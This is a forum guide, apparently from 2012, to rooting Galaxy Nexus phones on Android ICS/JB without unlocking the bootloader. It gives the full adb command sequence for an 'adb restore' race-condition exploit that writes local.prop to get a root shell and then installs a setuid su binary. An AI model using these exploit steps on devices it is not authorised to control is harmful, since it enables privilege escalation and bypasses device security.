As of Oct 10, 2012: Google has patched this vulnerability starting with JRO03U. That is to say, this works on versions of ICS and JB from ITL41D to JRO03O inclusive. It will not work for JRO03U or newer.

Once you have root, you can use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!

How this works

You can now root any version of ICS and JB released to-date without having to unlock your bootloader (and without losing your data).

Moreover, you should now be able to root your device even if your hardware buttons are not working.

Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.

Notes:

Step-by-step:

adb push su /data/local/tmp/su

adb push Superuser.apk /data/local/tmp/Superuser.apk

adb restore fakebackup.ab

adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done"

adb reboot

it will be laggy and the screen will flicker -- this is normal

adb shell

mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system

cat /data/local/tmp/su > /system/bin/su

chmod 06755 /system/bin/su

ln -s /system/bin/su /system/xbin/su

cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk

chmod 0644 /system/app/Superuser.apk

rm /data/local.prop

exit

adb shell "sync; sync; sync;"

adb reboot

chown 0.0 /system/bin/su

(My previous guide found here only worked on Android versions 4.0.1 and 4.0.2, i.e., ITL41D/F and ICL53F.I just isolated the parts required for the GNex, modified it slightly and eliminated the script.So, it looks like Bin4ry (with the help of a couple of others) has managed to find a way to exploit a timing difference in the "adb restore" command. See source here . (Although this may be old news to some, I hadn't seen it before a few days ago.) This is more for informational purposes, as having a Nexus device, we are able to backup our data, unlock the bootloader and restore the backup, so this is guide is not really that useful for most, but you still have those users who are scared to unlock their bootloader. It is useful however, for those with a broken power button, as it allows them to unlock their bootloader without the power button.The way this works is as follows: the "adb restore" command needs to be able to write to /data to restore a backup. Because of this, we can find a way to write something to /data while this is being done. Now, Android parses a file called /data/local.prop on boot. If the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. So, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.So what does this all mean:1) Please read the entire post before attempting this.2) This does not wipe any of your data, but I take no responsibility if something happens and you lose your data. Maybe consider doing a backup as per this thread before attempting this.3) This assumes that you have USB Debugging enable on your device () and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these . If you don't know how to install them, or are having issues, look here 4) This obviously needs to be done over ADB, as you cannot run adb in a terminal emulator on-device. If you do not have ADB, I've attached it in the zip (Windows and Linux versions). Unzip all files.1) Download the attached files to your computer and unzip them;2) Open a command prompt in that same directory;3) Copy the root files to your device:4) Restore the fake "backup":5) Run the "exploit":6) Now that the "exploit" is running, click restore on your device.7) Once it finishes, reboot your device:8) Once it is rebooted, open a shell:Note: Once you do step 8, your should have a root shell, i.e., your prompt should be #, not $. If not, it did not work. Start again from step 4. (It may take a few tries for it to work. Thanks segv11 .)Now we can copy su and Superuser.apk to the correct spots to give us root.9) Mount the system partition as r/w:10) Copy su to /system:11) Change permissions on su:12) Symlink su to /xbin/su:13) Copy Superuser.apk to /system:14) Change permissions on Superuser.apk:15) Delete the file that the exploit created:16) Exit the ADB shell:(May have to type exit twice to get back to your command prompt.)17) Type the following (not sure if this is needed for the GNex, but it shouldn't matter):18) Reboot:19) Done. You now should have root without having to unlock your bootloader. If you want to unlock now, you can without wiping anything. See segv11's app linked at the beginning of this post.Note: If you still do not have root access after doing these steps, redo them and add this step between 10 and 11:10b) Change the owner of su:(Thanks maxrfon .)